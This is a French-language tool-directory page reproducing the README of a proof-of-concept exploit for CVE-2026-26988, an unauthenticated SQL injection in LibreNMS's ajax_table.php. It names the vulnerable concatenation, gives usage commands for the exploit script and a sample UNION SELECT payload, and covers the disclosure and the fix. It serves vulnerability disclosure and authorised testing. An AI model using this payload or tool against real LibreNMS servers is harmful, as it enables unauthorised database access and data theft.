Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-26988-LibreNMS-SQLi — Preuve de concept d'exploitation pour une injection SQL non authentifiée dans LibreNMS ajax_table.php, démontrant des techniques d'injection aveugle basées sur le temps et sur les booléens pour des tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/mbanyamer/cve-2026-26988-librenms-sqli
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubmbanyamer/cve-2026-26988-librenms-sqli

CVE-2026-26988-LibreNMS-SQLi

Preuve de concept d'exploitation pour une injection SQL non authentifiée dans LibreNMS ajax_table.php, démontrant des techniques d'injection aveugle basées sur le temps et sur les booléens pour des tests de sécurité autorisés.

Voir le dépôt
15il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Author Role Country Platform Vulnerability CVE CVSS Status

CVE-2026-26988 – Preuve de concept d'injection SQL non authentifiée dans LibreNMS

Injection SQL non authentifiée dans ajax_table.php de LibreNMS via le paramètre de recherche d'adresse IPv6.

  • Versions affectées : LibreNMS ≤ 25.12.0
  • Corrigé dans : LibreNMS ≥ 26.1 (commit 15429580baba03ed1dd377bada1bde4b7a1175a1)
  • CVSS v4.0 : 9.3 Critique
    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N
  • CWE : CWE-89 (Mauvaise neutralisation des éléments spéciaux utilisés dans une commande SQL – Injection SQL)

Résumé de la vulnérabilité

Le paramètre address lorsque search_type=ipv6 est divisé sur / en adresse et préfixe.
Le préfixe est directement concaténé dans une requête SQL sans échappement :

$sql .= " AND ipv6_prefixlen = '$prefix'";

Un guillemet simple (') dans la partie préfixe permet de sortir du littéral de chaîne → injection SQL arbitraire.

Schéma du flux d'attaque

flowchart TD
    A[Attaquant] -->|1. POST HTTP vers /ajax_table.php| B[Serveur web LibreNMS]
    B -->|2. id=address-search & search_type=ipv6| C[Analyse du paramètre address]
    C -->|3. Division sur '/' → $address / $prefix| D[Construction de la requête SQL vulnérable]
    D -->|4. Concaténation : ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
    E -->|5. Exécution de la requête injectée| F[Retour des résultats / erreur / délai]
    F -->|6. L'attaquant observe la réponse / le timing| A

    subgraph "Point d'injection"
        D
    end

    style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff

Utilisation de la preuve de concept

Prérequis

  • Python 3.x
  • Bibliothèque requests (pip install requests)

Test de base (erreur de syntaxe / 500)

python3 exploit.py http://cible/librenms --test

Confirmation aveugle basée sur le temps (recommandé)

python3 exploit.py http://192.168.1.50/librenms --time

→ Si la réponse prend >5–6 secondes → vulnérable

Test aveugle basé sur le booléen

python3 exploit.py http://cible/librenms --boolean

Exemple de charge utile personnalisée

python3 exploit.py http://cible/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "

Fichiers de ce dépôt

  • exploit.py .............. Script principal de la preuve de concept (renommer depuis cve-2026-26988-poc.py si nécessaire)
  • README.md ............... Ce fichier

Divulgation responsable

  • Signalé : février 2026 (via GitHub Security Advisory)
  • Corrigé dans : commit 15429580baba... → PR #18777
  • Avis : https://github.com/librenms/librenms/security/advisories/GHSA-h3rv-q4rq-pqcv

Avis légal et éthique

Cette preuve de concept est fournie à des fins éducatives et de tests de sécurité autorisés uniquement.

N'utilisez PAS ce code contre un système ou un réseau sans autorisation écrite explicite du propriétaire.
Toute utilisation non autorisée peut violer des lois, y compris (sans s'y limiter) le Computer Fraud and Abuse Act (CFAA) aux États-Unis, ou une législation équivalente dans votre pays.

Utilisation à vos propres risques.


Auteur : Mohammed Idrees Banyamer
Instagram : @banyamer_security
Date : 20 février 2026

Télécharger l’outil